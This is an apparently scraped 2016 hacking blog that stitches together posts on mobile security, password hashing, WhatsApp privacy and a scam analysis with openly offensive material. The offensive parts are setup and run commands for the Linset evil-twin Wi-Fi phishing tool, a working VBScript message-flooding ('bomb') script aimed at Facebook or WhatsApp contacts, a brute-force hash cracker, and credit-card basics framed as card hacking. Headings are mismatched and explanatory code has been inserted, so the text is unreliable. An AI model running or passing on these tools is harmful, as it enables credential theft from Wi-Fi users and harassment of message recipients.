5 Best Ways to Secure Mobile Users

As mobile devices have become an essential part of daily life, they will soon be used as a tool for employees to enhance their productivity. While workplace flexibility and convenience are increasing, mobile employees are actually putting enormous amounts of company data at risk. Most of the time employees use third-party applications, ignore security updates, and access unprotected network connections, which leaves personal and corporate data at risk and makes them the easiest target for cyber criminals.

To reduce this risk on the employee side, Alvaro Hoyos, the Chief Information Security Officer at OneLogin, has suggested some tips that will surely enable organizations to double-check the security of their mobile users and employees.



Realistic Security Policies:


Organizations should prefer reliable and realistic policies. If they implement policies that are too rigid compared to the organization’s maturity, chances are that employees will subvert or ignore them altogether.
Policies should be strict but also workable, so that employees are inclined to follow the policy and still get their work done. This is important for mobile users who operate corporate applications on their smartphones or tablets. Policies should be implemented for every device that is used by employees.

Multifactor authentication:


As many employees access their information and work for the organization from a remote location, it is most important to ensure that the right person is using the right information. For that, multi-factor authentication should be used to guarantee the access controls.
Hackers are evolving their attack techniques; the only way to protect against unauthorized access is to implement multi-factor authentication for mobile users, which reduces the risk of a hacking incident.

Empower Employee:


Organizations deploy many automated detection systems that alert them to any unusual or unexpected activity. This process can be extended to the most granular part of the organization: its employees. By empowering employees to become part of the organization’s detection plan, they get to know about the activities they have direct control over, such as a password change or a login from a new location, which helps the organization make employees part of its early detection plan.

Understanding the Risk of Mobility:

Mobile devices, whether used by employees or by other mobile users, should not be primary systems, should not have complete access, and should not carry confidential organizational information. Organizations should consider how devastating a stolen or misplaced device could be. To overcome this critical issue, mobile users should protect their devices with a trusted SaaS solution. Additionally, documents on mobile systems should be backed up on a daily basis.
Furthermore, policies should define for mobile end users what data can be copied to mobile devices and what data should never leave those same systems.


Continuous Monitoring and tracking:


As employees are accessing the systems from mobile devices in huge numbers, it is possible that a device may get lost, stolen or misplaced. For such cases an asset tracking system should be implemented. No doubt these solutions are expensive, but they are worth the investment to protect an organization’s assets from falling into the wrong hands. Devices that are no longer in use or have been lost or stolen need to be tracked as well, in case they reappear on your network.

Even when you know which remote device is doing what from where, threats will still be there. Monitoring is the best option to expose suspicious activity and to prevent employees from entering privileged mode or accessing restricted information. Unauthorized mobile users can be devastating for any organization, so prevention techniques should be implemented to reduce this risk.


~ Friday, 30 September 2016 0 comments

WPA WPA2 Phishing Tool: Linset

Linset (the name is a recursive acronym, "Linset Is Not a Social Engineering Tool") is used to hack without brute force; it requires only two programs, lighttpd and php5-cgi.

apt-get install lighttpd

apt-get install php5-cgi

After you unzip the download, place the linset folder found in the download into root. This folder contains a php file, a backup php and an alldata.txt. You cannot change the name of the linset folder or place it in another location unless you change the bash script.



How it works

Scan the networks.
Select a network.
Capture the handshake (can be used without a handshake).
Choose one of several web interfaces (tailored thanks to the collaboration of the users).
A FakeAP imitating the original is set up.
A DHCP server is created on the FakeAP.
A DNS server is created to redirect all requests to the host.
The web server with the selected interface is launched.
The mechanism that checks the validity of the entered passwords is launched.
All users of the network are de-authenticated, in the hope that they connect to the FakeAP and enter the password.
The attack stops once the correct password has been verified.

How to Use

$ git clone https://github.com/chunkingz/linsetmv1-2.git

$ cd linsetmv1-2

$ chmod a+x linsetmv1-2

$ mv linset /

$ ./linsetmv1-2



~ Tuesday, 27 September 2016 0 comments

Durvasav: Bruteforce Password Cracker

Durvasav is a simple brute-force password hash cracker written in C. It is a console program released under GNU GPL version 3 and runs on Windows. The tool is used to recover the plain text from standard hashes. It uses the OpenSSL library for generating hashes.



Durvasav allows us to compare thousands of hashes to a hash table at a time. It supports MD4, MD5, SHA0, SHA1, SHA224, SHA256, SHA384 and SHA512 standard hashing algorithms. You can also produce hash tables of all these hashes for different character sets or generate wordlists for reverse hash lookup.



Features:

Supports MD4, MD5, SHA0, SHA1, SHA224, SHA256, SHA384 and SHA512.
Uses fast OpenSSL library.
Includes wide variety of character sets and a custom character set.
Performs ‘pseudo’ operation.
Hash table generation.
Generates bruteforce password table.
Import and compare hash tables containing thousands of hashes.
Maximum password length of 12 characters (will increase it).
Wordlist generation for all characters.
Compatible with Windows 32bit and 64bit.

You can either choose from predefined character sets or a custom character set of your own.

[0…9] – Numeric from 0-9.
[a…z] – Small letters from a-z.
[A…Z] – Capital letters from A-Z.
[0…z] – 0-9 numeric and a-z alphabets.
[0…Z] – 0-9 numeric and A-Z alphabets.
[a…Z] – All small and capital letters.
[0..a..Z] – All numbers, small letters and capital letters.
[All] – All numbers, small letters, capital letters and all special characters.
[Custom] – Select this if you want to use a custom character set.



~ 0 comments

C Programming For Hackers - Part 4


~ Thursday, 22 September 2016 0 comments

Open Source OSINT Assistant: DataSploit

Various Open Source Intelligence (OSINT) tools are used to capture data and give the user all the relevant information about a domain / email / phone number / person, etc. This allows us to expand our attack/defense surface by collecting relevant information about the target.

DataSploit requires only minimal input (such as a domain name, email ID, person name, etc.). It is built with technologies that are popular in the field: Python, MongoDB and Django. Once the data is collected, the noise is removed first, after which the data is correlated, and after multiple iterations it is stored locally in a database that can be easily visualized in the provided UI. The sources are picked after thorough analysis and are known to provide reliable information.



Features:

  • Performs automated OSINT on a domain / email / username / phone and find out relevant information from different sources.
  • Useful for Pen-testers, Cyber Investigators, Product companies, defensive security professionals, etc.
  • Correlates the results and shows them in a consolidated manner.
  • Tries to find out credentials, api-keys, tokens, sub domains, domain history, legacy portals, etc. related to the target.
  • Available as single consolidating tool as well as standalone scripts.
  • Available in both GUI and Console.
Requirements:

  • MongoDb, Django, Celery and RabbitMq
  • Bunch of python libraries
    • amqp==1.4.9
    • anyjson==0.3.3
    • BeautifulSoup==3.2.1
    • beautifulsoup4==4.4.1
    • billiard==3.3.0.23
    • bs4==0.0.1
    • celery==3.1.23
    • clearbit==0.1.4
    • config==0.3.9
    • Django==1.9.8
    • django-celery==3.1.17
    • dnspython==1.14.0
    • future==0.15.2
    • idna==2.1
    • json2html==1.0.1
    • kombu==3.0.35
    • lxml==3.6.0
    • piplapis-python==5.1.0
    • pyinotify==0.9.6
    • pymongo==3.3.0
    • python-Wappalyzer==0.2.2
    • python-whois==0.6.2
    • pytz==2016.6.1
    • requests==2.10.0
    • requests-file==1.4
    • simplejson==3.8.2
    • six==1.10.0
    • tldextract==2.0.1
    • tqdm==4.7.6
    • termcolor



~ Tuesday, 20 September 2016 0 comments

Has your password been leaked?

Don't want to read the theory? Just want to see if your password has been leaked? Click here or scroll down.

How websites store data

When you create an account on a website, the website stores your registration details in its SQL databases. Very few people, even within the company/website, have direct access to the databases.

In a naive world, the database would contain your plaintext passwords. However, since there are hackers doing SQL injection attacks to dump the database data, it's helpful to keep the password hashed/ encrypted. This would mean that even if someone has access to the table, he would see your username, email address, and hashed password, but not the plain-text password.

Those who don't know about hashing may wonder how the website checks whether you are typing the correct password during login if the site itself doesn't know your password. Well, to understand that, you must understand what hashing is. You can read it up on Wikipedia for a technical idea, but I'll (grossly over-)simplify it for you.

Hashing is any operation which is easy in one direction, and difficult in reverse. For example, mixing two colors is easy, while finding out the constituent colors of a color mixture isn't quite that easy. Multiplying two large (prime) numbers is easy, but given the huge number that results, it isn't easy to find the two prime factors which multiply to give that number.

Hashing example

Let's say your password is "pass", and there's a hashing function f(x). Then, 
f("pass") = d@A2qAawqq21109 (say).
Going the forward way is quite simple. On the other hand, figuring out the plain-text password from the hash (d@A2qAawqq21109) is almost impossible.

So, when you create an account and type the password "pass", d@A2qAawqq21109 is stored in the database. When you log in and type the password "pass", the server hashes it, and it becomes "d@A2qAawqq21109", which is matched against the SQL database. If you typed some other password, say "ssap", then the hash generated would be different, and you wouldn't be able to log in. Note that while the hashing function gives different outputs for most strings, every once in a while there may be collisions (two strings may have the same hash). This is very, very rare, and shouldn't be of any concern to us.

Forgot Your Password - Ever wondered why almost all websites give you a new password when you forget your old one, instead of just telling you your password. Well, now you know, it turns out that they themselves don't know your password, and hence can't tell you. When they offer you a chance to change your password, they just change the corresponding hash in their tables, and now your new password works.

How hashes are cracked - I wrote earlier that hash functions are easy to go one way, but almost impossible to go the other. The task of going the other way can be accomplished by the brute-force method. Basically, suppose someone had the password "pass". Now, a hacker who only has access to the hashes can hash all the passwords in alphabetical order and then check which hash matches (assume the hacker knows the password has length four and contains only letters).
He tries 'aaaa','aaab', 'aaac',......'aaba', 'aabb' ,'aabc',.....'aazz' , 'abaa', ................ 'paaa','paab',.. ,'pass'. When he tries 'aaaa', the hash is not d@A2qAawqq21109, it is something else. Till he reaches 'pass', he gets a hash which doesn't match  d@A2qAawqq21109. But for 'pass', the hash matches. So, the hacker now knows your password.

Website leaks


Due to the above reason, website leaks are bad, but not that bad. If the passwords are sufficiently complex, the hashing algorithm is secure, and a salt (explained later) is used, then it's quite unlikely that the hackers would be able to get many passwords from the database dump. So, even if the Facebook DB is leaked, your passwords are most probably safe. Unfortunately, "most probably" is not something one can work with, especially when you have so much to lose in case the 0.1% chance of the password being compromised is the one that materializes. So, after a DB leak, the website often asks all its users to change their passwords (e.g. the dropbox leak, linkedin leak, myspace leak, etc.). Also, since you might be using the same password on different websites, it's important that you change your password everywhere.

This isn't even the worst part though. Some websites don't hash your passwords, and store them in plain text instead. If their database is leaked, the hacker has immediate access to millions of accounts on that website, plus possibly tens of millions of accounts on other websites which use the same email/username - password combination. For example, the 000webhost database had plain-text passwords, and it was leaked. I personally hosted a site there once, and my account was compromised as well.

But this still isn't the worst part. The hackers often dump the databases publicly. The responsible ones let the website know that their security sucks, and ask them to inform their customers about the leak and get their passwords changed. After sufficient time is given to the website to act, the hacker would often dump the database publicly. To see the extent of this, take 000webhost's example. The first search result for "000webhost leak" gives you the database, which you can download and see the passwords. The password I was using 3-4 years ago is there in the database. That very password is probably still there on some of the websites that I signed up for 3-4 years ago but haven't used since then (and hence didn't update the password).

Problem 1 : Suppose there's a hashing scheme X. Under that scheme, "pass" becomes d@A2qAawqq21109. Now this is a very secure scheme and every website uses it. Now, there's a guy who has a lot of computational power and he computes the hashes of all possible letter combinations under scheme X. Given a hashed value, he can simply look it up in his table and see what password it corresponds to. He makes this word-to-hash table available online. Now it's quite easy to get the passwords from a database dump.

Problem 2 : Alternatively, even if the scheme isn't common, one can take a common password, say "password", hash it, and then search all the users in the 100 million user password dump to see if any hash matches. If it does, then that means that the given user has the password "password". By using 1 million common passwords, he'll probably get 10% of the users' passwords among the 100 million users.

Solution : Hashing Salt - To prevent that, each user chooses a password, and is given a random string, the hashing salt. The hashing function operates on both the password and the salt. So, if two users have same password, but different salts, then they'll have different hashes. This renders both the above techniques/problems useless. Now, to get the correct hash, the hacker has to input the correct password and the correct salt to the hashing function. This means that -

  1. The first problem, where someone else pre-computed the password-hash table, is solved, since now that person has to make a password-salt-hash table (for every password and every salt combination, what's the hash), which is going to be too many possible combinations. If there are 10 million possible passwords, and 10 million possible salts, there would be 100 million million combinations (I don't even know what million million even is). If there are 10 common salts which are used very often, then the person can make a table with all the 10 million passwords hashed for the 10 common salts. Alternatively, the person can hash the 10 most common passwords with the 10 million possible salts. Thus, it's important to have both strong passwords and random salts.
  2. The second problem is also kind of solved, since the person would have to compute the hash of the common passwords with each salt in the table (note that he doesn't have to do it for all 10 million combinations, only the ones present in the table). Again, not using easy generic passwords like "password", "hello", etc. would solve this issue.

Weak salts? One of the flaws with hashing is that it could have weak salts. WPA/WPA-2 is quite robust, but since it used the SSID of the network as salt, the routers which use default SSID's ("linksys","netgear",etc.) are more vulnerable than others since rainbow tables exist which have hashes for most common passwords and most common SSIDs. That said, I'd like to re-iterate, WPA/WPA-2 is still quite damn secure, and I pointed this out only as a relevant example.
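The two problems, the salt fix and the weak-salt caveat can be seen side by side in a short script. This is an added example, not code from the original post: the user names and passwords are constructed sample data, SHA-256 stands in for "scheme X", and the salted scheme uses PBKDF2 with an iteration count chosen here as an assumption (a deliberately slow hash, which goes one step beyond what the post describes).

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumption: PBKDF2 work factor picked for this example


def unsalted_hash(password):
    """Scheme X from Problem 1: the same password always gives the same hash."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def salted_hash(password, salt):
    """Hash password and salt together; PBKDF2 also makes every guess slow."""
    return hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, ITERATIONS
    ).hex()


def register(password, salt=None):
    """Return the row a site would store: salt and hash, never the password."""
    if salt is None:
        salt = os.urandom(16)  # random per-user salt
    return {"salt": salt, "hash": salted_hash(password, salt)}


def verify(password, row):
    """Login check: re-hash the typed password with the stored salt, compare."""
    return hmac.compare_digest(salted_hash(password, row["salt"]), row["hash"])


def table_hits(table, stored_hashes):
    """Count stored hashes that a precomputed hash -> password table resolves."""
    return sum(1 for h in stored_hashes if h in table)


# Constructed sample data (not taken from any real leak).
COMMON_PASSWORDS = ["password", "hello", "pass", "123456"]
USERS = {"alice": "password", "bob": "password", "carol": "pass"}


def compare_schemes():
    # One table, computed once, works against every unsalted dump (Problem 1).
    table = {unsalted_hash(p): p for p in COMMON_PASSWORDS}

    unsalted = {u: unsalted_hash(p) for u, p in USERS.items()}
    salted = {u: register(p) for u, p in USERS.items()}
    # Weak salt: every row shares one predictable value, like a default SSID.
    shared = {u: register(p, salt=b"linksys") for u, p in USERS.items()}

    return {
        "unsalted_table_hits": table_hits(table, unsalted.values()),
        "salted_table_hits": table_hits(
            table, [row["hash"] for row in salted.values()]
        ),
        "unsalted_alice_equals_bob": unsalted["alice"] == unsalted["bob"],
        "salted_alice_equals_bob": salted["alice"]["hash"] == salted["bob"]["hash"],
        "shared_salt_alice_equals_bob": shared["alice"]["hash"] == shared["bob"]["hash"],
        "login_ok": verify("password", salted["alice"]),
        "login_wrong_password": verify("ssap", salted["alice"]),
    }


if __name__ == "__main__":
    for key, value in compare_schemes().items():
        print(f"{key}: {value}")
```

With a shared, predictable salt the two users with the same password collide again, which is exactly what makes precomputed tables for default SSIDs worthwhile.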

Are you compromised?

Out of all the leaks so far, I had accounts in 4 of the leaks. My account was there in the Myspace leak, the LinkedIn leak, the dropbox leak, and the 000webhost leak. I had to change my password on multiple sites on multiple occasions. 

One way to find out if you're compromised is to look for all the dumps and check manually if you're in them. However, that's practically impossible (not all dumps are public, and looking for your name/email in a huge file takes the computer more time than you'd guess). Fortunately, there's a website which specifically exists for this purpose, known as LeakedSource. You can search using your email free of cost. They offer some extra functionality for pretty affordable rates ($4 paypal, $2 bitcoin). 


I am compromised

If you find out that your account is indeed compromised, then I suggest you quickly change your password on all services that you use which have the same password. Better yet, change all your passwords. It's good practice to keep changing your passwords regularly anyway. Also, if a website has the two step authentication feature, then it's suggested that you use it.

~ Sunday, 18 September 2016 0 comments

C Programming For Hackers - Part 3


~ Saturday, 17 September 2016 0 comments

How to stop WhatsApp from sharing your Mobile Number with Facebook

It has been more than two years since Facebook officially acquired WhatsApp to expand its digital marketing landscape. Although WhatsApp CEO Jan Koum said that user privacy wouldn’t suffer, the services are about to get a little bit friendlier with their data sharing.

Whatsapp has changed its privacy policy; in its new privacy policy it gives permission to share data, including your phone number, with Facebook. In an FAQ, WhatsApp says it is doing this to:

More accurately count unique users.
Better fight spam and abuse.
Show better friend suggestions and more relevant ads to you on Facebook.



In a blog post, Whatsapp stated the reason behind this data sharing that highlights its plan to test the ways to communicate with businesses.

“Whether it’s hearing from your bank about a potential fraudulent transaction, or getting notified by an airline about a delayed flight, many of us get this information elsewhere, including in text messages and phone calls. We want to test these features in the next several months”.

What can be done to avoid this sharing of information between Whatsapp and Facebook?

There are two ways to opt out of sharing your account information with Facebook for targeting purposes.

Method 1:

On WhatsApp, don’t click Agree when it asks you to confirm you are happy with the change of terms. Instead, click Read more. You should then see a check box or control button at the bottom of the screen which says “Share my WhatsApp account information with Facebook to improve my Facebook ads and product experiences”. Uncheck this.



Method 2:

If you have already agreed to the updated terms, you can go to Settings > Account > Share my account info in the app. Then uncheck the box or toggle the control. But be quick: WhatsApp says you only have 30 days to make this choice after agreeing to the new terms.



It seems that you can’t completely opt out of this, as WhatsApp says that your information is sent to Facebook for other purposes such as improving infrastructure and delivery systems, understanding how its services are being used, securing systems, and fighting spam, abuse, or infringement activities.

So it’s clear that some of your information is still accessible to Facebook in a secure and reliable way. The only way to avoid this information sharing is to avoid using WhatsApp.


~ Friday, 16 September 2016 0 comments

4 Best Linux Command Line Books

Almost every geek is fascinated by Linux's complex beauty, security and flexibility, but if you are a non-Linux user or a beginner, it can be a headache even to extract a zip file or install a program using the terminal. So if you want to learn Linux, I would strongly recommend reading Linux command line and shell scripting books, eBooks or PDFs to build your skills from scratch.

Linux Command Line

Best Books to learn Linux Command Line

Linux is all about commands and code; without them it is nothing. It has certainly been introducing nice-looking GUIs since its dawn, yet most tasks are still done through the terminal. And it is not difficult once you begin doing it yourself; all you need is good resources, and Linux PDF eBooks are said to be an excellent source for learning quickly and easily.


The Linux Command Line: A Complete Introduction

One of the best Linux books, featuring a complete introduction to the command line, from basic file navigation to advanced topics such as writing programs in Bash. It gives you very practical examples and explains everything with in-depth tutorials. The initial part serves as an introduction and teaches fundamental lessons like manipulating files and directories, package installation, keyboard tricks, etc., and then it takes you to the advanced level of networking, package management, redirection, editing with Vi and compiling programs. You will also learn to automate boring tasks using shell scripting. It is very beginner friendly, with easily digestible chapters and lots of illustrations as well.


Learn Linux FAST: Including All Essential Command Lines (Linux for Beginners)

If you are an absolute beginner and want to learn from the very basics, then this book is for you. It's a very helpful short read for newbies because its primary concern is building your foundation by teaching you important command lines and tools. It teaches with step-by-step tutorials and unfolds some amazing tips and tricks. It also contains loads of guides on installation and getting started, along with a brief introduction to Linux distros, and after that it gives some serious practical lessons on installing software, redirection, file editing commands and wildcards too.


Linux Pocket Guide: Essential Commands

This is the best book for Linux commands because it contains hundreds of commands with clear explanations and tutorials on topics such as programming with shell scripts, media, text manipulation and pipelines, user management, controlling processes and all the other important commands which make you a power user. Whether you are a novice, an expert or a daily user, you should always have it in your pocket as a quick reference guide. I personally suggest this book to everyone as it is capable of making you a Linux ninja.


Linux Command Line and Shell Scripting Bible

Do you want to become an expert at the command line and shell scripting? Then this is what you need. This is an all-in-one Linux book covering a wide range of lessons on shell scripting and command line fundamentals. It will actually teach you how to communicate directly with your computer using code, giving you more capability and time. The major part of the book is filled with an immense guide on creating practical scripts and understanding and creating shells. You will learn to write simple script utilities to automate tasks, use the Dash and Bash shells, and work with editors like nano and the KDE and GNOME editors. It also features one of the largest Linux command cheat sheets.


~ Friday, 9 September 2016 0 comments

C programming for Hackers - Part 2


~ Thursday, 8 September 2016 0 comments

C Programming for Hackers - Part 1

Facebook Bomb using VB-script





Script :



' InputBoxes

Message = InputBox("What Is The Message?","WhatsApp DDos")

MsgBox "VBScript Written By Priyank Gada"

T = InputBox("How Many Times Needs It To Be Send?","WhatsApp DDos")

If MsgBox("You've Filled It In Correctely", 1024 + vbSystemModal, "WhatsApp DDos") = vbOk Then



' Go To WhatsApp

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("https://www.facebook.com/messages", 1)



' Loading Time



If MsgBox("Search for the name and click on message section?" & vbNewLine & vbNewLine & "Press No To Cancel", vbYesNo + vbQuestion + vbSystemModal, "WhatsApp DDos") = vbYes Then



' The Loop For The Messages

For i = 0 to T

WScript.Sleep 5

WshShell.SendKeys Message

WScript.Sleep 5

WshShell.SendKeys "{ENTER}"

Next



' End Of The Script

WScript.Sleep 3000

MsgBox "Please Visit www.youtube.com/c/priyankgada"

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("http://www.youtube.com/priyankgada", 1)





' Canceled Script

Else

MsgBox "Process Has Been Canceled", vbSystemModal, "DDos Canceled"

End If

Else

End If



~ Wednesday, 7 September 2016 0 comments

Whatsapp Bomb using VB-Script

Today, we are going to learn how to bomb messages on WhatsApp Web using VBScript.




Explanation of the script.

' InputBoxes
This section is the data input. Here we take inputs from the user. Contact stores the name of the contact, Message stores the message, and T stores the number of times.


' Go To WhatsApp
This section redirects the user to WhatsApp Web.

' Loading Time
This section will wait for you to load WhatsApp Web.

' Go To The WhatsApp Search Bar
This section will press the Tab key and move the pointer from the URL address bar to the WhatsApp message bar.

' Go To The Contacts Chat
This section will type the contact name in the search bar.

' The Loop For The Messages
This section will type the message and press Enter as many times as we want the message to be sent (T).

' End Of The Script
This is the popup shown when the script has completed.

' Canceled Script
This section will show a popup when the script is cancelled.


~ 0 comments

Create Your First Hidden Website with TOR

Want to explore the world of the DarkNet and create your own hidden website with TOR? The ideal course is here: “Create Hidden Website Using TOR for Beginners”. Creating a hidden website on the DarkNet is not difficult. Start as a beginner and explore the endless possibilities of using a TOR web server from a different perspective.


In this course you will learn:

How to configure a hidden web server using TOR hidden services.
How to tune Nginx for maximum anonymity.
How to serve HTML content to visitors with (almost) no web server installed to enable maximum anonymous service.
Important security tips anyone running hidden services server should know.

Who should take this course?

This course is for anyone who wishes to set up their first own hidden TOR web server.
Anyone who is interested in exploring the DarkNet.

Just enroll now and in several hours you will be able to start your own DarkNet website! For only $20, start creating your own TOR websites.


~ 0 comments

Whatsapp 4G VIP SCAM - Technical Analysis


This is a short blog post about a recent hoax concerning WhatsApp version 4.0. I would like to clearly highlight that there is no such application as 'Whatsapp 4G'. The version promises users unrealistic features such as video calling, new WhatsApp themes, deleting sent messages from both sides, etc.

The following is how the message is being propagated:


Technical Analysis 

Upon visiting the link you are taken to a page that asks you to invite 15 friends before you can download the version. Upon clicking the invite button, it uses the WhatsApp URL scheme (whatsapp://) in order to send messages to your friends, and hence you end up promoting the hoax on behalf of the scammers:

The entire business logic is based upon the following client side script - http://new-4g-whatsapp.ga/invite.js.

Upon examining invite.js it was discovered that the code sets a cookie and checks if 15 invites have been sent on the client side: 



Once the counter has reached 15 invites or more, you are redirected to the download link:

From the above source code, if the value of c is greater than or equal to '15', window.location.href is set to the "ur" variable, which holds the following download link - http://ta3.co/new-4G-whatsapp/install.php

The installation link seems to be dead. Normally in such scams you would be asked to fill in surveys or install *free apps*, which would not be free as they might ship with malware/adware.


Update (Whatsapp Gold)


A new variation of the Whatsapp 4G VIP scam has recently come to notice under the name "Whatsapp Gold", which basically works on the same principle as above. The only things that have changed are the interface design and the name.

~ Tuesday, 6 September 2016 0 comments

Credit Card 101 - Part 1

Hello guys, we are back with another awesome article. In this series of articles (Credit Card 101) we are going to learn about various credit cards, how credit cards work, how to hack credit cards and, most important, how to secure your personal credit card. So to start with credit card hacking we must first understand how credit cards are designed and how they work.


Credit Card Numbers :

So let's consider a random credit card number as an example (this is not my credit card).

4485 3151 5882 2849
The credit card number is divided into several parts, which help the payment gateway charge the actual holder of the credit card.
1. The first digit (4) is the MII.
2. The next 5-6 digits are the issuer ID.
3. The following digits, leaving out the last one, are the user ID.
4. The last digit is the check number, also known as the check algorithm number.



What is MII ?

MII stands for major industry identifier. This is a constant number that is given to the consumer according to the needs of the consumer. For example, in most cases a consumer uses his/her credit card number for online transactions. This is the reason most credit card numbers start with 4 or 5, which means banking and financial industry. This digit can range from 0 to 9. More information is provided at the bottom of the article.


What is Issuer ID ?

The issuer ID stands for the card provider, i.e. Visa, Mastercard, etc. For example, if the digits are 4xxxx then it is a VISA card and the length of the card number is 16. More information is provided at the bottom of the article.

What is User ID ?

This number is basically the Identity of the user and the bank to which the card was issued . It depends on the users account number and other details . This number can be reused if a particular card holder stops using the service.


What is check number ?

A check number is used to ensure the validity of the card. It is the last digit of the credit card. Credit cards follow luhn check algorithm.

Luhn's Credit Card Algorithm:


Original Number: 4485 3151 5882 2849

1. From the back, double every alternate digit (the last digit, the check number, is not doubled).
What we get: 8  (16)  6  (10)  (10)  (16)  4  8

2. If a doubled number has two digits, add those two digits together.
What we get: 8   7   6   1   1   7   4   8

3. Write back the alternate digits that we left out in the first step.
8475   6111   1872   4889

4. Add up all the digits of the new number that we get.
8+4+7+5+6+1+1+1+1+8+7+2+4+8+8+9=80

5. If the sum is a multiple of 10 then the credit card number is valid.
Since 80 is a multiple of 10, we can conclude that 4485 3151 5882 2849 can be a valid credit card number.

MII Digit Value = Category
0 = Other industry assignments
1 = Airlines industry assignments
2 = Airlines and other industry assignments
3 = Travel and entertainment
4 = Banking and financial
5 = Banking and financial
6 = Merchandising and Banking
7 = Petroleum
8 = Telecommunications and other industry assignments
9 = National assignment

Issuer ID : Card Number
  • Diner's Club/Carte Blanche : 300xxx-305xxx, 36xxxx, 38xxxx
  • American Express : 34xxxx, 37xxxx
  • VISA : 4xxxxx
  • Mastercard : 51xxxx-55xxxx
  • Discover : 6011xx
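
As an added example (not code from the original article), the Python below implements the Luhn steps and the MII and issuer lookups from the tables above, and goes one step further by using the check defensively: scanning log text for Luhn-valid card numbers so they can be found and masked. The function names, the candidate pattern and the sample log lines are assumptions constructed for illustration.

```python
import re

# Tables transcribed from the article: MII digit -> category, issuer prefixes.
MII = ["Other industry assignments", "Airlines industry assignments",
       "Airlines and other industry assignments", "Travel and entertainment",
       "Banking and financial", "Banking and financial",
       "Merchandising and banking", "Petroleum",
       "Telecommunications and other industry assignments", "National assignment"]
ISSUERS = [(r"30[0-5]|36|38", "Diner's Club/Carte Blanche"),
           (r"34|37", "American Express"), (r"4", "VISA"),
           (r"5[1-5]", "Mastercard"), (r"6011", "Discover")]
# Assumed scanner pattern: 13-19 digits, optionally split by spaces or dashes.
CANDIDATE = re.compile(r"\b(?:[0-9][ -]?){12,18}[0-9]\b")

def luhn_valid(number):
    """Steps 1-5 above: double alternate digits from the back, sum, test mod 10."""
    compact = re.sub(r"[ -]", "", number)
    if not re.fullmatch(r"[0-9]+", compact):
        return False
    total = 0
    for i, ch in enumerate(reversed(compact)):
        d = int(ch)
        if i % 2 == 1:      # every second digit, counted from the check digit
            d *= 2
            if d > 9:       # two-digit product: add its digits (same as d - 9)
                d -= 9
        total += d
    return total % 10 == 0

def describe(number):
    """Classify by MII digit and issuer prefix, and run the Luhn check."""
    compact = re.sub(r"[ -]", "", number)
    issuer = next((n for p, n in ISSUERS if re.match(p, compact)), "unknown")
    mii = MII[int(compact[0])] if re.match(r"[0-9]", compact) else "unknown"
    return {"mii": mii, "issuer": issuer, "luhn_valid": luhn_valid(compact)}

def find_card_numbers(text):
    """Return Luhn-valid candidates in free text, masked to first 6 / last 4."""
    hits = []
    for m in CANDIDATE.finditer(text):
        compact = re.sub(r"[ -]", "", m.group())
        if luhn_valid(compact):
            hits.append(compact[:6] + "*" * (len(compact) - 10) + compact[-4:])
    return hits

# Constructed log lines; the first carries the article's example number.
SAMPLE_LOG = ("2016-09-04 12:00:01 checkout card=4485 3151 5882 2849 status=ok\n"
              "2016-09-04 12:00:02 order id=4485315158822848 status=ok\n")
if __name__ == "__main__":
    print(describe("4485 3151 5882 2849"), find_card_numbers(SAMPLE_LOG))
```

The Luhn filter is what keeps a scanner like this from flagging every long order or tracking number: only the first sample line is reported, because changing the last digit of the second breaks the checksum.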





Check the next article (will be updated soon)





~ Sunday, 4 September 2016 0 comments

A Critical Vulnerability in Inteno Routers

Security researchers are warning users regarding new critical vulnerabilities in Inteno routers, which could allow remote attackers to replace the firmware on a device to take complete control over it and monitor the internet traffic.

According to F-Secure, the issue affects the Inteno EG500, FG101 and DG201 routers. More models could be affected, but F-Secure couldn’t be sure due to the vendor’s unwillingness to cooperate.

F-Secure reported the issue in January, but when the vendor replied two months later it argued that software issues are dealt with by the operators that sell the equipment to the end users.



The vulnerability itself stems from the fact that several router models don’t validate the Auto Configuration Server (ACS) certificate. This allows an attacker to launch a Man in the Middle (MITM) attack between the ACS and the device and gain full administrative access to the router, allowing them to replace the firmware.

The implications of such a flaw are potentially serious, according to F-Secure cyber security expert, Janne Kauhanen. He warned:

“By changing the firmware, the attacker can change any and all rules of the router. Watching video content you’re storing on another computer? So is the attacker. Updating another device through the router? Hopefully it’s not vulnerable like this, or they’ll own that too”.

Although HTTPS traffic is encrypted and is of no use to an attacker who intercepts it, the attacker can still redirect all your traffic to malicious sites that enable them to drop malware on your machine.

However, if HTTPS is not implemented and the attacker is able to launch a Man in the Middle attack, there is no way left to prevent successful exploitation. Janne Kauhanen told Infosecurity:

“Gaining a MitM position is not trivial, but it’s not outside the realm of possibilities either, whether physically attacking a whole building by breaking into the distribution trunk in the building or using software tricks to route network traffic through a malicious site”.

F-Secure recommended that users keep browsers and other software updated to prevent hackers from exploiting any flaws. It also suggested using effective, well-known antivirus software to prevent malware downloads, and using a VPN to encrypt internet traffic and prevent hackers from gaining that initial foothold in the network.


~ Friday, 2 September 2016 0 comments

Breaking The Great Wall of Web - XSS WAF Evasion CheatSheet


I think it's mandatory to give back to the security community from which we learn cutting-edge techniques and information. Therefore, after months of effort, I am presenting to you a new WhitePaper titled "Breaking Great Wall of Web" without any strings attached.


Acknowledgements

I would like to thank the Acunetix Team for helping with proof-reading of the document.

Background



The WhitePaper not only contains sophisticated XSS vectors but also aims at explaining the methodology behind bypassing a WAF. The previous paper on this subject, "Bypassing Modern WAF's XSS Filters - Cheat Sheet", was released 3 years back. A lot has changed and evolved during these years; especially with the advent of ECMAScript, a new horizon for evasion/obfuscation has been opened. I have already discussed/demonstrated several techniques presented in this whitepaper in my recent webcast hosted by the Garage4hackers team, namely "Bypassing Modern WAF's Exemplified At XSS".

Abstract 



Input validation flaws such as XSS are the most prevalent security threats affecting modern web applications. In order to mitigate these attacks, Web Application Firewalls (WAFs) are used, which inspect HTTP requests for malicious transactions. Nevertheless, they can be easily bypassed due to the complexity of JavaScript in modern browsers. In this paper we will discuss several techniques that can be used to circumvent WAFs, exemplified at XSS.

This paper will talk about the concepts of WAFs in general, identifying and fingerprinting WAFs, and various methodologies for constructing a bypass. The paper discusses well-known techniques such as brute forcing, regular expression reversing and browser bugs for bypassing WAFs.


~ Thursday, 1 September 2016 0 comments

Want to become Security Engineer?

The risk of financial and reputation damage caused by a data breach has led to greater demand for security engineers, and a growing skills gap. However, with a growing skills gap comes greater opportunity for a fulfilling and lucrative career as a security engineer.



